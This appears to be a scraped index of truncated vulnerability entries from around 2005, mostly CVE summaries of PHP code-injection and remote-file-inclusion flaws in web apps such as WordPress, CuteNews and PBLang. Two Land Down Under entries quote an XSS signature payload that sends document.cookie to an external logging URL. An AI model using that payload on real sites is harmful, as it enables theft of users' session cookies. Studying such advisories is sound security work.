CVE-2005-3010

CVE-2005-3010 affects CuteNews (version 1.4.0 and earlier). A direct static code injection vulnerability in the flood protection feature (inc/shows.inc.php) allows a remote attacker to inject and execute arbitrary PHP code via the HTTP_CLIENT_IP header (Client-Ip), which is injected into data/flo...

CVE-2005-2893

Direct static code injection vulnerability in setcookie.php in PBLang 4.65, and possibly earlier versions, allows remote attackers to execute arbitrary PHP code via the username u parameter, which is directly injected into a file that is later executed upon login...

CVE-2005-2893

Direct static code injection vulnerability in setcookie.php in PBLang 4.65, and possibly earlier versions, allows remote attackers to execute arbitrary PHP code via the username u parameter, which is directly injected into a file that is later executed upon login...

CVE-2005-2893

CVE-2005-2893 affects PBLang 4.65 (and possibly earlier). The vulnerability is a direct static code injection in setcookie.php where the username parameter (u) is directly injected into a file that is later executed upon login, enabling remote code execution. The available sources identify the vu...

AMember Multiple Script config[root_dir] Parameter Remote File Inclusion

The remote host appears to be running AMember, a commercial membership and subscription management script written in PHP. The version of AMember installed on the remote host fails to properly sanitize user-supplied input to the 'configrootdir' parameter before using it in several scripts to inclu...

CVE-2005-2781

The Avatar upload feature in FUD Forum before 2.7.0 does not properly verify uploaded files, which allows remote attackers to execute arbitrary PHP code via a file with a .php extension that contains image data followed by PHP code...

CVE-2005-2775

phpapi.php in phpWebNotes 2.0.0 uses the extract function to modify key variables such as $tpathcore, which leads to a PHP file inclusion vulnerability that allows remote attackers to execute arbitrary PHP code via the tpathcore parameter...

lduXSS2.txt

Bug finder:spyMASter Web site:Realhackers.net Contact:[email protected] LDU has some xss vulns Firstly you can use html codes in your signature you can get cookies with this put your signature that code location.href='http://site.com/log/ekle.php?c='+escapedocument. cookie and post a topic...

Simple Machines Forum < 1.0.7 Code Injection

Binary data 3198.prm...

CMS Made Simple 0.10 - &#039;Lang.php&#039; Remote File Inclusion

source: https://www.securityfocus.com/bid/14709/info CMS Made Simple is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may exploit this issue to execute arbitrary remote PHP code on an affected...

CVE-2005-2717

PHP remote file inclusion vulnerability in WebCalendar before 1.0.1 allows remote attackers to execute arbitrary PHP code when opening settings.php, possibly via sendreminders.php or other scripts...

Land Down Under

Bug finder:spyMASter Web site:Realhackers.net Contact:[email protected] LDU has some xss vulns Firstly you can use html codes in your signature you can get cookies with this put your signature that code SCRIPT location.href='http://site.com/log/ekle.php?c='+escapedocument. cookie/SCRIPT an...

AutoLinks Pro 'al_initialize.php alpath Parameter Remote File Inclusion

The remote host is running AutoLinks Pro, a commercial link management package. The version of AutoLinks Pro installed on the remote host allows attackers to control the 'alpath' parameter used when including PHP code in the 'alinitialize.php' script. By leveraging this flaw, an unauthenticated...

CVE-2005-2685

SaveWebPortal 3.4 allows remote attackers to execute arbitrary PHP code via a direct request to admin/PhpMyExplorer/editerfichier.php, then editing the desired file to contain the PHP code, as demonstrated using header.php in the fichier parameter. NOTE: it is possible that this vulnerability ste...

CVE-2005-2612

Direct code injection vulnerability in WordPress 1.5.1.3 and earlier allows remote attackers to execute arbitrary PHP code via the cachelastpostdateserver cookie...

CVE-2005-2612

The CVE covers a Direct code injection vulnerability in WordPress 1.5.1.3 and earlier that allows remote attackers to execute arbitrary PHP code via the cache_lastpostdate[server] cookie. Affected software is WordPress (versions prior to 1.5.1.3). Root cause is improper handling of the cache_last...

CVE-2005-2612

Direct code injection vulnerability in WordPress 1.5.1.3 and earlier allows remote attackers to execute arbitrary PHP code via the cachelastpostdateserver cookie...

CVE-2005-2568

Eval injection vulnerability in the template engine for SysCP 1.2.10 and earlier allows remote attackers to execute arbitrary PHP code via a string containing the code within "" and "" curly bracket characters, which are processed by the PHP eval function...

Gravity Board X 1.1 - CSS Template Unauthorized Access

Gravity Board X 1.1 - CSS Template Unauthorized Access source: https://www.securityfocus.com/bid/14502/info Gravity Board X GBX is affected by an unauthorized access vulnerability. This issue is due to a failure in the application to perform proper access validation before granting access to...

Gravity Board X 1.1 - CSS Template Unauthorized Access

source: https://www.securityfocus.com/bid/14502/info Gravity Board X GBX is affected by an unauthorized access vulnerability. This issue is due to a failure in the application to perform proper access validation before granting access to privileged functions. An attacker can exploit this...